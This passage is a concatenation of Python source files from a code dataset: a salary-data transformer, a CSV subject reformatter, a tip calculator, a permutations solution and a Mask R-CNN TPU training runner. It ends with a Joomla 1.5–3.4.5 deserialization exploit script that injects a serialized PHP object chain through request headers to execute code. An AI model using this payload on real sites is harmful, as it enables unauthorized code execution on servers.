identifier(self):\n \"\"\"\n Identifier by Texas Tech Systems\n\n Ignore everything but name/gender. We have not found any\n duplicate name gender records (yet), and should not as TT\n includes middle initials.\n \"\"\"\n excluded = [self.race_key, self.department_key, self.job_title_key,\n self.hire_date_key, self.compensation_key,\n self.system_status_key, ]\n return {\n 'scheme': 'tx_salaries_hash',\n 'identifier': base.create_hash_for_record(self.data,\n exclude=excluded)\n }\n\n @property\n def person(self):\n name = self.get_name()\n return {\n 'family_name': name.last,\n 'given_name': name.first,\n 'additional_name': name.middle,\n 'name': unicode(name),\n }\n\n\ntransform = base.transform_factory(record_class=TransformedRecord,\n transform_func=base.generic_merge_cell_transform)\n","sub_path":"tx_salaries/utils/transformers/texas_tech_system.py","file_name":"texas_tech_system.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"212966362","text":"import argparse\nfrom datetime import datetime\nimport ast\nimport pandas as pd\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-b', '--batch', help='Batch letter to name outputs.')\nargs = parser.parse_args()\n\nif args.batch:\n batch = args.batch\nelse:\n batch = input('Enter batch letter: ')\n\nfileList = ['subjectMatchesReviewed_BatchC2019-11-13 09.19.01 copy.csv']\n\n\ndef singleSelection(vocabType, results, selection):\n results = ast.literal_eval(results)\n selection = selection - 1\n newSubject = results[selection]\n newSubject = newSubject.strip()\n subjectDict['newSubject'] = newSubject\n if vocabType == 'fast':\n subjectDict['newKey'] = 'dc.subject.fast'\n if vocabType == 'mesh':\n subjectDict['newKey'] = 'dc.subject.mesh'\n subject_list.append(subjectDict)\n\n\ndef multipleSelections(vocabType, results, selection):\n results = ast.literal_eval(results)\n subjects = []\n for select in selection:\n 
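# the reviewer's selections in the CSV are 1-based positions in the results list, hence the shift to 0-based indices below\n        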
select = select.strip()\n select = int(select)\n select = select - 1\n newSubject = results[select]\n newSubject = newSubject.strip()\n subjects.append(newSubject)\n subjects = '|'.join(subjects)\n subjectDict['newSubject'] = subjects\n if vocabType == 'fast':\n subjectDict['newKey'] = 'dc.subject.fast'\n if vocabType == 'mesh':\n subjectDict['newKey'] = 'dc.subject.mesh'\n subject_list.append(subjectDict)\n\n\ndef exactSubject(results):\n results = results.strip()\n subjectDict['newSubject'] = results\n subject_list.append(subjectDict)\n\n\nerror_list = []\nsubject_list = []\nfor filename in fileList:\n df_subjects = pd.read_csv(filename, header=0)\n ori_total = df_subjects.cleanedSubject.size\n print(ori_total)\n for index, row in df_subjects.iterrows():\n print(str(ori_total-index)+' left')\n row = dict(row)\n subjectDict = row.copy()\n subjectDict['oldKey'] = 'dc.subject'\n cleanedSubject = row['cleanedSubject']\n vocabType = row['type']\n results = row['results']\n selection = row['selection']\n try:\n selection = int(selection)\n except ValueError:\n if pd.isnull(selection):\n selection = selection\n elif ',' in selection:\n selection = selection.split(',')\n else:\n selection = selection.strip()\n if vocabType == 'fast_exact':\n subjectDict['newKey'] = 'dc.subject.fast'\n exactSubject(results)\n elif vocabType == 'mesh_exact':\n subjectDict['newKey'] = 'dc.subject.mesh'\n exactSubject(results)\n elif isinstance(selection, int):\n singleSelection(vocabType, results, selection)\n elif isinstance(selection, list):\n multipleSelections(vocabType, results, selection)\n elif selection == 'new selection' and ('[' not in results):\n subjectDict['newSubject'] = results\n if vocabType == 'fast':\n subjectDict['newKey'] = 'dc.subject.fast'\n if vocabType == 'mesh':\n subjectDict['newKey'] = 'dc.subject.mesh'\n elif selection == 'none' or vocabType == 'not found':\n subjectDict['newSubject'] = cleanedSubject\n subjectDict['newKey'] = 'dc.subject'\n subject_list.append(subjectDict)\n else:\n error_list.append(subjectDict)\n\n\nprint('{} errors found'.format(len(error_list)))\n\ndt = datetime.now().strftime('%Y-%m-%d %H.%M.%S')\ndf = pd.DataFrame.from_dict(subject_list)\ndf2 = pd.DataFrame.from_dict(error_list)\n\nsubjectFile = 'subjectsCombined'+'_Batch'+batch+'_'+dt+'.csv'\nerrorFile = 'errors_Batch'+batch+'_'+dt+'.csv'\ndf.to_csv(subjectFile, index=False)\ndf2.to_csv(errorFile, index=False)\n","sub_path":"reformatCSVFromFASTSearches.py","file_name":"reformatCSVFromFASTSearches.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"456067486","text":"print(\"Welcome to the tip calculator\")\n#If the bill was $150.00, split between 5 people, with 12% tip. \nbill = float(input((\"What is the total bill ? \")))\n#Each person should pay (150.00 / 5) * 1.12 = 33.6\ntip_percent = int(input((\"What perentage tip will you like to give ? \")))\n#Format the result to 2 decimal places = 33.60\nnum_people= int(input((\"How many people are spliting the bill ? \")))\n\nbill_per_person = bill/num_people\n\ntip = (tip_percent/100) * bill_per_person\n\nyour_bill = round(bill_per_person + tip,2)\n\n#Tip: There are 2 ways to round a number. 
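round(your_bill, 2) returns a rounded float, while \"{:.2f}\".format(your_bill) formats it as a string with exactly two decimals. 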
You might have to do some Googling to solve this.💪\n#HINT 1: https://www.google.com/search?q=how+to+round+number+to+2+decimal+places+python&oq=how+to+round+number+to+2+decimal\n#HINT 2: https://www.kite.com/python/answers/how-to-limit-a-float-to-two-decimal-places-in-python\nyour_bill= \"{:.2f}\".format(your_bill)\nprint(f\"Each person should pay ${your_bill}\")\n","sub_path":"Day 3/Tip_calculator.py","file_name":"Tip_calculator.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"523980579","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/7/25 23:00\n# @Author : weiyu\n# @File : 46_permutations.py\n\n# 递归\nclass Solution:\n def permute(self, nums):\n res = []\n self.recursion(nums, [], res)\n return res\n\n def recursion(self, nums, path, res):\n if len(nums) == len(path):\n res.append(path)\n for i in list(set(nums).difference(set(path))):\n self.recursion(nums, path + [i], res)\n\n # def recursion(self, nums, path, res):\n # if not nums:\n # res.append(path)\n # for i in range(len(nums)):\n # self.recursion(nums[:i] + nums[i + 1:], path + [nums[i]], res)\n\n","sub_path":"Week_02/46_permutations.py","file_name":"46_permutations.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"152249777","text":"# Copyright 2018 Google. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Train_and_eval MaskRcnn with low level API.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport functools\nimport os\nimport threading\nimport time\nimport six\n\nimport tensorflow as tf\nfrom tensorflow.contrib.tpu.python.tpu import device_assignment as tpu_device_assignment\nfrom tensorflow.contrib.tpu.python.tpu import tpu\nfrom tensorflow.contrib.tpu.python.tpu import tpu_feed\nfrom tensorflow.contrib.tpu.python.tpu import tpu_function\nfrom tensorflow.python.framework import graph_io\nimport eval_multiprocess\nimport mask_rcnn_params\nimport runner_utils\nfrom mlp_log import mlp_log\n\n\n_INITIAL_LOSS = 1e7\n_STOP = -1\n_MAX_NUM_CHECKPOINT_THREADS = 1\n# for spatial partition\n_NUM_CORES_TO_COMPUTATION_SHAPE = {\n 1: [1, 1, 1],\n 2: [1, 1, 2],\n 4: [1, 2, 2],\n 8: [2, 2, 2],\n 16: [4, 2, 2],\n}\n\n\nclass TrainEvalLowLevelRunner(object):\n \"\"\"Run Train via direct session.run calls.\"\"\"\n\n def __init__(self, tpu_cluster_resolver, train_params, eval_params,\n eval_steps, eval_metric, input_partition_dims=None,\n num_cores_per_replica=None, tpu_job_name=None):\n tf.logging.info(\"TrainLowLevelRunner: constructor\")\n\n self.tpu_cluster_resolver = tpu_cluster_resolver\n self.eval_metric = eval_metric\n self.train_params = train_params\n self.eval_params = eval_params\n self.train_params[\"batch_size\"] = (\n 
train_params[\"train_batch_size\"] // train_params[\"num_shards\"])\n self.eval_params[\"batch_size\"] = (\n eval_params[\"eval_batch_size\"] // eval_params[\"num_shards\"])\n self.tpu_job_name = tpu_job_name\n\n self.model_dir = train_params[\"model_dir\"]\n self.iterations_per_loop = train_params[\"iterations_per_loop\"]\n self.eval_steps = eval_steps\n self.num_shards = self.train_params[\"num_shards\"]\n self.input_flattener = runner_utils.InputsFlattener()\n self.eval_input_flattener = runner_utils.InputsFlattener()\n self.num_hosts = None\n self.train_eval_compile_op = None\n self.train_eval_op = None\n self.infeed_queue = []\n self.eval_infeed_queue = []\n self.outfeed_names = []\n self.outfeed_tensors = []\n self.enqueue_ops = []\n self.eval_enqueue_ops = []\n self.dequeue_ops = []\n self.dataset_initializer = []\n self.eval_dataset_initializer = []\n self.scaffold_fn = None\n # Having two separate sessions and graphs to make the initialization faster.\n self.input_sess = None\n self.train_eval_sess = None\n self.input_graph = tf.Graph()\n self.train_eval_graph = tf.Graph()\n self.session_config = tf.ConfigProto(\n allow_soft_placement=True, isolate_session_state=True,\n operation_timeout_in_ms=600 * 60 * 1000) # 10 hours\n cluster_spec = self.tpu_cluster_resolver.cluster_spec()\n if cluster_spec:\n self.session_config.cluster_def.CopyFrom(cluster_spec.as_cluster_def())\n self.tpu_init = tf.contrib.tpu.initialize_system()\n self.tpu_shutdown = tf.contrib.tpu.shutdown_system()\n self.master = self.tpu_cluster_resolver.get_master()\n self.init_sess = tf.Session(self.master, config=self.session_config)\n self.device_topology = self.init_sess.run(self.tpu_init)\n self.input_partition_dims = input_partition_dims\n self.use_spatial_partition = input_partition_dims is not None\n self.num_cores_per_replica = num_cores_per_replica\n if self.use_spatial_partition:\n computation_shape = _NUM_CORES_TO_COMPUTATION_SHAPE[\n self.num_cores_per_replica]\n self.device_assignment = tpu_device_assignment.device_assignment(\n topology=self.device_topology,\n computation_shape=computation_shape,\n num_replicas=self.num_shards)\n tf.logging.info(\"num_cores_per_replica: %d\", self.num_cores_per_replica)\n tf.logging.info(\"computation_shape: %s\", str(computation_shape))\n tf.logging.info(\"num_replicas: %d\", self.num_shards)\n tf.logging.info(\"device_assignment.topology.device_coordinates: %s\",\n str(self.device_assignment.topology.device_coordinates))\n tf.logging.info(\"device_assignment.core_assignment: %s\",\n str(self.device_assignment.core_assignment))\n self.input_dims_flattener = runner_utils.InputDimsFlattener(\n self.input_partition_dims)\n eval_input_partition_dims = [dict(self.input_partition_dims[0]), None]\n # don't need to partition the \"is_padding\" dimension\n if eval_params[\"eval_samples\"] % eval_params[\"eval_batch_size\"] != 0:\n eval_input_partition_dims[0][mask_rcnn_params.IS_PADDING] = None\n self.eval_input_dims_flattener = runner_utils.InputDimsFlattener(\n eval_input_partition_dims)\n else:\n self.device_assignment = None\n self.input_dims_flattener = None\n self.eval_input_dims_flattener = None\n # Summary writer writes out train metrics.\n self.summary_writer = tf.summary.FileWriter(self.model_dir)\n # Summary writer writes out eval metrics.\n eval_output_dir = os.path.join(self.model_dir, \"eval\")\n tf.gfile.MakeDirs(eval_output_dir)\n self.eval_summary_writer = tf.summary.FileWriter(eval_output_dir)\n self.infeed_thread = None\n self.total_epoch = 
self.train_params[\n \"total_steps\"] // self.iterations_per_loop\n\n def shutdown(self):\n \"\"\"Shut down TrainLowLevelRunner.\"\"\"\n tf.logging.info(\"TrainLowLevelRunner: shutdown\")\n if self.infeed_thread:\n self.infeed_thread.join()\n if self.input_sess:\n self.input_sess.close()\n if self.train_eval_sess:\n self.train_eval_sess.close()\n self.summary_writer.close()\n self.eval_summary_writer.close()\n\n def _get_host(self, host_id):\n if self.master in (\"\", \"local\"):\n return \"/replica:0/task:0\"\n job_name = (\n self.tpu_job_name or self.tpu_cluster_resolver.get_job_name() or\n \"tpu_worker\")\n return \"/job:%s/task:%d\" % (job_name, host_id)\n\n def build_enqueue_ops(self, input_fn, params, num_hosts, host_id, iterations,\n is_training=True):\n \"\"\"Build enqueue ops.\"\"\"\n tf.logging.info(\"TrainLowLevelRunner: build_enqueue_ops for %d, train=%g\",\n host_id, is_training)\n\n def get_enqueue_ops_fn(host_id):\n \"\"\"Generate the enqueue ops graph function for training.\"\"\"\n # TODO(b/129084726): make dataset sharding also work for TPU Estimator.\n params[\"dataset_num_shards\"] = num_hosts\n params[\"dataset_shard_id\"] = host_id\n with tf.device(runner_utils.device_for_host(self._get_host(host_id))):\n dataset = input_fn(params)\n iterator = dataset.make_initializable_iterator()\n if is_training:\n self.dataset_initializer.append(iterator.initializer)\n else:\n self.eval_dataset_initializer.append(iterator.initializer)\n\n def enqueue_ops_fn():\n \"\"\"Enqueue ops function for one host.\"\"\"\n per_host_sharded_inputs = []\n control_deps = []\n for _ in range(self.train_params[\"replicas_per_worker\"]):\n with tf.control_dependencies(control_deps):\n features, labels = iterator.get_next()\n if self.use_spatial_partition:\n self.input_dims_flattener.validate_and_flatten_input_dims(\n features, labels)\n flattened_inputs = (\n self.input_flattener.flatten_features_and_labels(\n features, labels))\n control_deps.extend(flattened_inputs)\n per_host_sharded_inputs.append(flattened_inputs)\n\n if self.use_spatial_partition:\n flattened_input_dims = (\n self.input_dims_flattener.flattened_input_dims)\n # pylint: disable=protected-access\n infeed = tpu_feed._PartitionedInfeedQueue(\n number_of_tuple_elements=len(per_host_sharded_inputs[0]),\n host_id=host_id,\n input_partition_dims=flattened_input_dims,\n device_assignment=self.device_assignment)\n self.infeed_queue.append(infeed)\n return infeed.generate_enqueue_ops(per_host_sharded_inputs)\n\n infeed = tf.contrib.tpu.InfeedQueue(\n number_of_tuple_elements=len(per_host_sharded_inputs[0]))\n self.infeed_queue.append(infeed)\n return infeed.generate_enqueue_ops(\n per_host_sharded_inputs,\n tpu_ordinal_function=functools.partial(\n runner_utils.tpu_ordinal_fn,\n replicas_per_worker=self.train_params[\"replicas_per_worker\"]))\n\n return enqueue_ops_fn\n\n def get_eval_enqueue_ops_fn(host_id):\n \"\"\"Generate the enqueue ops graph function for eval.\"\"\"\n # TODO(b/129084726): make dataset sharding also work for TPU Estimator.\n params[\"dataset_num_shards\"] = num_hosts\n params[\"dataset_shard_id\"] = host_id\n with tf.device(runner_utils.device_for_host(self._get_host(host_id))):\n dataset = input_fn(params)\n iterator = dataset.make_initializable_iterator()\n self.eval_dataset_initializer.append(iterator.initializer)\n\n def eval_enqueue_ops_fn():\n \"\"\"Enqueue ops function for one host.\"\"\"\n per_host_sharded_inputs = []\n control_deps = []\n for _ in range(self.train_params[\"replicas_per_worker\"]):\n with 
tf.control_dependencies(control_deps):\n features = iterator.get_next()\n if self.use_spatial_partition:\n self.eval_input_dims_flattener.validate_and_flatten_input_dims(\n features, None)\n flattened_inputs = (\n self.eval_input_flattener.flatten_features_and_labels(\n features, None))\n control_deps.extend(flattened_inputs)\n per_host_sharded_inputs.append(flattened_inputs)\n\n if self.use_spatial_partition:\n flattened_input_dims = (\n self.eval_input_dims_flattener.flattened_input_dims)\n # pylint: disable=protected-access\n infeed = tpu_feed._PartitionedInfeedQueue(\n number_of_tuple_elements=len(per_host_sharded_inputs[0]),\n host_id=host_id,\n input_partition_dims=flattened_input_dims,\n device_assignment=self.device_assignment)\n self.eval_infeed_queue.append(infeed)\n return infeed.generate_enqueue_ops(per_host_sharded_inputs)\n\n infeed = tf.contrib.tpu.InfeedQueue(\n number_of_tuple_elements=len(per_host_sharded_inputs[0]))\n self.eval_infeed_queue.append(infeed)\n return infeed.generate_enqueue_ops(\n per_host_sharded_inputs,\n tpu_ordinal_function=functools.partial(\n runner_utils.tpu_ordinal_fn,\n replicas_per_worker=self.train_params[\"replicas_per_worker\"]))\n\n return eval_enqueue_ops_fn\n\n with self.input_graph.as_default():\n enqueue_op = runner_utils.wrap_computation_in_while_loop(\n get_enqueue_ops_fn(host_id)\n if is_training else get_eval_enqueue_ops_fn(host_id),\n n=iterations,\n host_name=self._get_host(host_id))\n if is_training:\n self.enqueue_ops.append(enqueue_op)\n else:\n self.eval_enqueue_ops.append(enqueue_op)\n\n def initialize(self, model_fn, input_fn, eval_input_fn):\n \"\"\"Build graph and do initialization for training.\"\"\"\n tf.logging.info(\"TrainAndEvalLowLevelRunner: initialize method\")\n\n self.num_hosts = (\n self.num_shards * self.num_cores_per_replica //\n self.train_params[\"cores_per_worker\"])\n for i in range(self.num_hosts):\n self.build_enqueue_ops(input_fn, self.train_params, self.num_hosts, i,\n self.iterations_per_loop, True)\n self.build_enqueue_ops(eval_input_fn, self.eval_params, self.num_hosts, i,\n self.eval_steps, False)\n\n def infeed_thread_fn():\n \"\"\"Build and infeed session.run calls in a background thread.\"\"\"\n for cur_epoch in range(self.total_epoch):\n tf.logging.info(\"Start to infeed train batches for epoch %d\", cur_epoch)\n self.input_sess.run([self.enqueue_ops])\n tf.logging.info(\"Start to infeed eval batches for epoch %d\", cur_epoch)\n self.input_sess.run([self.eval_enqueue_ops])\n tf.logging.info(\"infeed thread exited.\")\n\n def tpu_train_step(loss):\n \"\"\"Generate the TPU graph.\"\"\"\n del loss\n values = self.infeed_queue[0].generate_dequeue_op(tpu_device=0)\n features, labels = self.input_flattener.unflatten_features_and_labels(\n values)\n estimator_spec = model_fn(features, labels, tf.estimator.ModeKeys.TRAIN,\n self.train_params)\n loss, train_op = estimator_spec.loss, estimator_spec.train_op\n self.scaffold_fn = estimator_spec.scaffold_fn\n with tf.control_dependencies([train_op]):\n return tf.identity(loss)\n\n @tpu_function.on_device_training_loop\n def train_loop():\n return tf.contrib.tpu.repeat(self.iterations_per_loop, tpu_train_step,\n [_INITIAL_LOSS])\n\n def tpu_eval_step():\n \"\"\"Generate the TPU graph.\"\"\"\n values = self.eval_infeed_queue[0].generate_dequeue_op(tpu_device=0)\n (features,\n _) = self.eval_input_flattener.unflatten_features_and_labels(values)\n estimator_spec = model_fn(features, None, tf.estimator.ModeKeys.PREDICT,\n self.eval_params)\n for k, v in 
six.iteritems(estimator_spec.predictions):\n self.outfeed_names.append(k)\n self.outfeed_tensors.append(v)\n\n with tf.device(runner_utils.device_for_tpu_core(self._get_host(0))):\n outfeed_enqueue_ops = tf.contrib.tpu.outfeed_enqueue_tuple(\n self.outfeed_tensors)\n with tf.control_dependencies([outfeed_enqueue_ops]):\n return tf.no_op()\n\n @tpu_function.on_device_training_loop\n def eval_loop():\n return tf.contrib.tpu.repeat(self.eval_steps, tpu_eval_step, [])\n\n def train_eval_step():\n with tf.control_dependencies(train_loop()):\n return eval_loop()\n\n @tpu_function.on_device_training_loop\n def train_eval_loop():\n return tf.contrib.tpu.repeat(\n self.total_epoch if self.train_params[\"all_in_one_session\"] else 1,\n train_eval_step, [])\n\n def create_dequeue_ops(host_id):\n \"\"\"Create outfeed dequeue ops.\"\"\"\n dequeue_ops = []\n tensor_dtypes = []\n tensor_shapes = []\n for v in self.outfeed_tensors:\n dequeue_ops.append([])\n tensor_dtypes.append(v.dtype)\n tensor_shapes.append(v.shape)\n for i in range(self.eval_params[\"replicas_per_worker\"]):\n with tf.device(runner_utils.device_for_host(self._get_host(host_id))):\n if self.use_spatial_partition:\n replica_id = self.device_assignment.lookup_replicas(host_id, 0)[i]\n ordinal = self.device_assignment.tpu_ordinal(\n replica=replica_id, logical_core=0)\n else:\n ordinal = i\n outfeed_tensors = tf.contrib.tpu.outfeed_dequeue_tuple(\n dtypes=tensor_dtypes,\n shapes=tensor_shapes,\n device_ordinal=ordinal)\n for j, item in enumerate(outfeed_tensors):\n dequeue_ops[j].append(item)\n for j in range(len(outfeed_tensors)):\n dequeue_ops[j] = tf.concat(dequeue_ops[j], axis=0)\n return dequeue_ops\n\n with self.train_eval_graph.as_default():\n (self.train_eval_compile_op,\n self.train_eval_op) = tpu.split_compile_and_shard(\n train_eval_loop,\n inputs=[],\n num_shards=self.train_params[\"num_shards\"],\n outputs_from_all_shards=False,\n device_assignment=self.device_assignment\n )\n for i in range(self.num_hosts):\n self.dequeue_ops.append({})\n tf.logging.info(\n \"TrainAndEvalLowLevelRunner: get dequeue ops for host:%d\", i)\n host_dequeue_ops = create_dequeue_ops(i)\n for j, dequeue_tenor in enumerate(host_dequeue_ops):\n self.dequeue_ops[i][self.outfeed_names[j]] = dequeue_tenor\n if self.scaffold_fn:\n self.scaffold_fn()\n global_initializer = tf.global_variables_initializer()\n local_initializer = tf.local_variables_initializer()\n graph_io.write_graph(\n self.train_eval_graph.as_graph_def(add_shapes=True), self.model_dir,\n \"graph.pbtxt\")\n self.saver = tf.train.Saver()\n\n # Build tpu train model session and initialize graph\n self.train_eval_sess = tf.Session(\n self.master,\n graph=self.train_eval_graph,\n config=self.session_config)\n\n self.train_eval_sess.run(global_initializer)\n self.train_eval_sess.run(local_initializer)\n # Compiles the train program.\n self.train_eval_sess.run([self.train_eval_compile_op])\n\n # Complete infeed graph generation and session.run calls\n self.input_sess = tf.Session(\n self.master,\n graph=self.input_graph,\n config=self.session_config)\n self.input_sess.run(self.dataset_initializer)\n self.input_sess.run(self.eval_dataset_initializer)\n self.infeed_thread = threading.Thread(target=infeed_thread_fn)\n\n # Starts the clock.\n mlp_log.mlperf_print(key=\"init_stop\", value=None)\n mlp_log.mlperf_print(key=\"run_start\", value=None)\n self.infeed_thread.start()\n\n def write_summary(self, summary_writer, graph, global_step,\n elapsed_time, elapsed_steps, trained_examples):\n 
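# called once per iterations_per_loop chunk from train_and_eval; the\n # global_step/sec and examples/sec rates below use wall-clock time\n 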
\"\"\"Write a per-epoch summary of loss, epoch time, etc.\"\"\"\n with graph.as_default():\n global_step_per_sec = elapsed_steps / elapsed_time\n examples_per_sec = trained_examples / elapsed_time\n if summary_writer is not None:\n global_step_summary = tf.Summary(value=[\n tf.Summary.Value(\n tag=\"global_step/sec\", simple_value=global_step_per_sec)\n ])\n example_summary = tf.Summary(value=[\n tf.Summary.Value(\n tag=\"examples/sec\", simple_value=examples_per_sec)\n ])\n summary_writer.add_summary(global_step_summary, global_step)\n summary_writer.add_summary(example_summary, global_step)\n tf.logging.info(\"step = %d (%.3f sec)\", global_step, elapsed_time)\n tf.logging.info(\"global_step/sec: %g\", global_step_per_sec)\n tf.logging.info(\"examples/sec: %g\", examples_per_sec)\n\n def write_eval_summary(self, summary_writer, eval_results, current_step):\n \"\"\"Write out eval results for the checkpoint.\"\"\"\n with tf.Graph().as_default():\n summaries = []\n for metric in eval_results:\n summaries.append(\n tf.Summary.Value(\n tag=metric, simple_value=eval_results[metric]))\n tf_summary = tf.Summary(value=list(summaries))\n summary_writer.add_summary(tf_summary, current_step)\n\n def get_predict_results(self, cur_epoch):\n \"\"\"Run the predict loop on the TPU device.\"\"\"\n for step in range(self.eval_steps):\n tf.logging.info(\n \"TrainAndEvalLowLevelRunner: reading eval step %d results\", step)\n predictions = {name: [] for name in self.outfeed_names}\n for outfeed_dict in self.train_eval_sess.run(self.dequeue_ops):\n for name, tensors in six.iteritems(outfeed_dict):\n predictions[name].extend(tensors)\n if step == self.eval_steps - 1:\n # all predictions is read from device, async eval post-process starts.\n # next train on device also starts.\n mlp_log.mlperf_print(\n \"block_stop\", None, metadata={\"first_epoch_num\": cur_epoch,\n \"epoch_count\": 1})\n mlp_log.mlperf_print(\n \"eval_start\", None, metadata={\"epoch_num\": cur_epoch})\n tf.logging.info(\"TrainAndEvalLowLevelRunner: start eval epoch %d.\",\n cur_epoch)\n mlp_log.mlperf_print(\n \"block_start\", None, metadata={\"first_epoch_num\": cur_epoch + 1,\n \"epoch_count\": 1})\n yield predictions\n\n def train_and_eval(self):\n \"\"\"Performs distributed model eval and writes a summary to directory.\"\"\"\n self.run_success = False\n self.continue_train = True\n\n # queues for predictions post-processing.\n def post_processing_thread_fn():\n \"\"\"Run post-processing on CPU for predictions.\"\"\"\n mlp_log.mlperf_print(\n \"block_start\", None, metadata={\"first_epoch_num\": 0,\n \"epoch_count\": 1})\n for cur_epoch in range(self.total_epoch):\n\n eval_begin = time.time()\n # Enables multi-processing to accelerate post-processing.\n eval_multiprocess.eval_multiprocessing(\n self.eval_steps, self.get_predict_results(cur_epoch),\n self.eval_metric, self.eval_params[\"eval_worker_count\"])\n\n pred_end = time.time()\n tf.logging.info(\"prediction takes %d seconds.\", pred_end - eval_begin)\n\n num_eval_samples, eval_results = self.eval_metric.evaluate()\n eval_end = time.time()\n tf.logging.info(\"COCO evaluates %d samples\", num_eval_samples)\n if num_eval_samples != self.eval_params[\"eval_samples\"]:\n tf.logging.info(\"COCO fails to evaluate all %d samples, exit!\" %\n self.eval_params[\"eval_samples\"])\n self.run_success = False\n self.continue_train = False\n return\n tf.logging.info(\"one evaluation takes %d seconds\",\n eval_end - eval_begin)\n self.write_eval_summary(self.eval_summary_writer, eval_results,\n 
cur_epoch * self.iterations_per_loop)\n tf.logging.info(\"AP: %s\" % eval_results[\"AP\"])\n tf.logging.info(\"mask_AP: %s\" % eval_results[\"mask_AP\"])\n # Eval epoch is 0-indexed (for MLPerf log parsing).\n mlp_log.mlperf_print(\n \"eval_stop\", None, metadata={\"epoch_num\": cur_epoch})\n # TODO(b/127959551): use both metrics once the bug is resolved.\n mlp_log.mlperf_print(\n \"eval_accuracy\", (float(eval_results[\"AP\"]),\n float(eval_results[\"mask_AP\"])),\n metadata={\"epoch_num\": cur_epoch})\n\n if (eval_results[\"AP\"] >= mask_rcnn_params.BOX_EVAL_TARGET and\n eval_results[\"mask_AP\"] >= mask_rcnn_params.MASK_EVAL_TARGET):\n mlp_log.mlperf_print(\"run_stop\", None, metadata={\"status\": \"success\"})\n self.run_success = True\n self.continue_train = False\n return\n\n # Run predict post processing thread on the background.\n post_processing_thread = threading.Thread(target=post_processing_thread_fn)\n post_processing_thread.start()\n if self.train_params[\"all_in_one_session\"]:\n tf.logging.info(\"TrainAndEvalLowLevelRunner: start train_eval sessions\")\n self.train_eval_sess.run(self.train_eval_op)\n else:\n if self.train_params[\"train_and_eval_save_checkpoint\"]:\n ckpt_saver = runner_utils.AsyncCheckpointSaver(\n _MAX_NUM_CHECKPOINT_THREADS, self.saver, self.model_dir,\n self.train_eval_sess)\n cur_epoch = 0\n while cur_epoch < self.total_epoch and self.continue_train:\n tf.logging.info(\"TrainAndEvalLowLevelRunner: start train epoch: %d\",\n cur_epoch)\n start = time.time()\n self.train_eval_sess.run(self.train_eval_op)\n end = time.time()\n self.write_summary(\n summary_writer=self.summary_writer,\n graph=self.train_eval_graph,\n global_step=cur_epoch * self.iterations_per_loop,\n elapsed_time=end - start,\n elapsed_steps=self.iterations_per_loop,\n trained_examples=self.train_params[\"num_examples_per_epoch\"])\n if self.train_params[\"train_and_eval_save_checkpoint\"]:\n ckpt_saver.checkpoint(cur_epoch * self.iterations_per_loop)\n if self.run_success or not self.continue_train:\n break\n cur_epoch += 1\n\n post_processing_thread.join()\n if not self.run_success:\n mlp_log.mlperf_print(\"run_stop\", None, metadata={\"status\": \"abort\"})\n","sub_path":"Google/benchmarks/mask/implementations/tpu-v3-128-mask/mask_rcnn/train_and_eval_low_level_runner.py","file_name":"train_and_eval_low_level_runner.py","file_ext":"py","file_size_in_byte":24790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"217189227","text":"#!/usr/bin/env python\r\n# author:Xiaogang\r\n# Help: joomla 1.5-3.4.5 反序列化命令执行漏洞\r\n# inurl:component/users/?view=login\r\n\r\nimport requests\r\nimport sys\r\n\r\n\r\ndef test_hint():\r\n print('[INFO] Checking Joomla 1.5 - 3.4.5 ...')\r\n\r\ndef test(url):\r\n target = url.strip()\r\n headers = make_headers()\r\n for i in headers:\r\n try:\r\n test_hint()\r\n result = get_url(target,i)\r\n if \"PHP Version\" in result.text:\r\n print(\"{}成功执行phpinfo\".format(i.keys()))\r\n else:\r\n print(\"{}漏洞不存在\".format(i.keys()))\r\n except Exception as e:\r\n print(\"出现错误\",e)\r\n\r\n\r\ndef get_url(url,headers):\r\n cookies = requests.request(\"GET\", url, timeout=10,headers=headers).cookies\r\n response = requests.request(\"GET\",url,timeout=10,headers=headers,cookies=cookies)\r\n return response\r\n\r\ndef make_headers():\r\n terminate = '\\xf0\\x9d\\x8c\\x86'\r\n payload = 
r'''123}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";s:37:\"phpinfo();JFactory::getConfig();exit;\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}'''\r\n headers1 = {\r\n 'User-Agent': payload+terminate\r\n }\r\n headers2 = {\r\n 'X-Forwarded-For': payload+terminate,\r\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:49.0) Gecko/20100101 Firefox/49.0'\r\n }\r\n header = [headers1,headers2]\r\n return header\r\n\r\n\r\ndef main():\r\n args = sys.argv\r\n if len(args) == 2:\r\n url = args[1]\r\n test(url)\r\n else:\r\n print(\"Usage: python {} url地址 \".format(args[0]))\r\n\r\n\r\nif __name__ == '__main__':\r\n 